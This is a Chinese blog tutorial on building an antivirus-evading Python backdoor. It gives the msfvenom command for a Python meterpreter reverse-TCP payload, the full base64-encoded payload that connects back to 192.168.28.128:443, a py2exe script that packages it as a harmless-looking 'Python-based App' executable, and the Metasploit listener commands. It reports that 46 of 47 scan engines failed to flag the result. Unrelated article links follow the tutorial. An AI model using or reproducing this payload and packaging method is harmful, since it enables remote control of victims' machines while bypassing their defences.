编程 Python

使用Python进行防病毒免杀解析

Posted in Python onDecember 13, 2019

很多渗透工具都提供了权限维持的能力，如Metasploit、Empire和Cobalt Strike，但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候，似乎越来越多的人关注的是，这个方式会不会被被杀软杀掉？

打造免杀的payload成了一个很重要的话题，在这里，本文将介绍如何使用Pyhton轻松绕过防病毒软件。

0x01 环境准备

1、软件安装

Python 2.7.16 x86：https://www.python.org/ftp/python/2.7.16/python-2.7.16.msi
Py2exe 32位：https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download

2、msfvenom生成Python Payload

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.28.128 LPORT=443 -f raw -o /var/www/html/evil.py

使用Python进行防病毒免杀解析

evil.py 代码如下：

import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjguMTI4Jyw0NDMpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')))

0x02 py2exe 打包Python程序

将evil.py复制到windows，同时创建一个setup.py文件：

from distutils.core import setup
import py2exe
setup(
name = 'Meter',
description = 'Python-based App',
version = '1.0',
console=['evil.py'],
options = {'py2exe': {'bundle_files': 1,'packages':'ctypes','includes': 'base64,sys,socket,struct,time,code,platform,getpass,shutil',}},
zipfile = None,
)

下面的方法运行 evil.py，生成可执行文件。

python ./setup.py py2exe

使用Python进行防病毒免杀解析

0x03 设置监听端口

Kali 运行Metasploit，设置监听：

msfconsole
use exploit/multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.28.128
set LPORT 443
run

在Windows中运行evil.exe，获得一个meterpreter的会话

使用Python进行防病毒免杀解析

0x04 免杀验证

确认生成的exe文件可正常工作，接下来对evil.exe进行在线病毒扫描，以确认免杀效果如何。
这里我们使用VirSCAN.org-多引擎在线病毒扫描网 v1.02,当前支持 47 款杀毒引擎

使用Python进行防病毒免杀解析

扫描结果：47款杀毒引擎中，只有一个引擎报毒，主流的杀毒软件全部绕过。

网站地址: http://www.virscan.org

参考文章：

https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1

总结

以上所述是小编给大家介绍的使用Python进行防病毒免杀，希望对大家有所帮助，如果大家有任何疑问请给我留言，小编会及时回复大家的。在此也非常感谢大家对三水点靠木网站的支持！
如果你觉得本文对你有帮助，欢迎转载，烦请注明出处，谢谢！

使用Python进行防病毒免杀解析

- Author -

Bypass

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

Python 相关文章推荐

python批量修改文件后缀示例代码分享

Dec 24 Python

python制作爬虫并将抓取结果保存到excel中

Apr 06 Python

简单谈谈python中的语句和语法

Aug 10 Python

解决Django模板无法使用perms变量问题的方法

Sep 10 Python

python实现自动发送报警监控邮件

Jun 21 Python

Django中使用Celery的教程详解

Aug 24 Python

python如何生成各种随机分布图

Aug 27 Python

tensorflow实现逻辑回归模型

Sep 08 Python

用Python将结果保存为xlsx的方法

Jan 28 Python

python pygame实现五子棋小游戏

Oct 26 Python

python字符串中匹配数字的正则表达式

Jul 03 Python

使用Python快速打开一个百万行级别的超大Excel文件的方法

Mar 02 Python

python 使用shutil复制图片的例子

Dec 13 #Python

基于python traceback实现异常的获取与处理

Dec 13 #Python

python 实现批量替换文本中的某部分内容

Dec 13 #Python

django多种支付、并发订单处理实例代码

Dec 13 #Python

Python+OpenCV+图片旋转并用原底色填充新四角的例子

Dec 12 #Python

Python+OpenCV 实现图片无损旋转90°且无黑边

Dec 12 #Python

使用python去除图片白色像素的实例

Dec 12 #Python

You might like

php遍历数组的4种方法总结

2014/07/05 PHP

PHP内核学习教程之php opcode内核实现

2016/01/27 PHP

PHP页面间传递值和保持值的方法

2016/08/24 PHP

php函数式编程简单示例

2019/08/08 PHP

jQuery最佳实践完整篇

2011/08/20 Javascript

js实现图片放大缩小功能后进行复杂排序的方法

2012/11/08 Javascript

JS对img进行操作(换图片/切图/轮换/停止)

2013/04/17 Javascript

Js表格万条数据瞬间加载实现代码

2014/02/20 Javascript

jQuery中slideUp()方法用法分析

2014/12/24 Javascript

jQuery Validate初步体验(一)

2015/12/12 Javascript

JavaScript中防止微信浏览器被整体拖动的方法

2017/08/25 Javascript

基于webpack 实用配置方法总结

2017/09/28 Javascript

使用vue.js在页面内组件监听scroll事件的方法

2018/09/11 Javascript

JavaScript计算正方形面积

2019/11/26 Javascript

微信小程序scroll-view锚点链接滚动跳转功能

2019/12/12 Javascript

vue-cli脚手架的.babelrc文件用法说明

2020/09/11 Javascript

详解vue中在父组件点击按钮触发子组件的事件

2020/11/13 Javascript

python网络编程学习笔记(七)：HTML和XHTML解析(HTMLParser、BeautifulSoup)

2014/06/09 Python

用python + hadoop streaming 分布式编程（一） -- 原理介绍，样例程序与本地调试

2014/07/14 Python

详细解读Python中的__init__()方法

2015/05/02 Python

Python 爬虫的工具列表大全

2016/01/31 Python

python内置函数：lambda、map、filter简单介绍

2017/11/16 Python

wxPython实现窗口用图片做背景

2018/04/25 Python

Python图像处理之图像的读取、显示与保存操作【测试可用】

2019/01/04 Python

PyQt Qt Designer工具的布局管理详解

2019/08/07 Python

浅谈cookie和localStorage那些事

2019/08/27 HTML / CSS

Html5嵌入钉钉的实现示例

2020/06/04 HTML / CSS

医学专业毕业生个人的求职信

2013/12/04 职场文书

一位农村小子的自荐信

2014/04/07 职场文书

环保志愿者活动总结

2014/06/27 职场文书

合作意向书

2014/07/30 职场文书

2014向国旗敬礼网上签名活动总结

2014/09/27 职场文书

刑事附带民事上诉状

2015/05/23 职场文书

工作简报怎么写

2015/07/21 职场文书

遇事可以测出您的见识与格局

2019/09/16 职场文书

动漫APP软件排行榜前十名，半次元上榜，第一款由腾讯公司推出

2022/03/18 杂记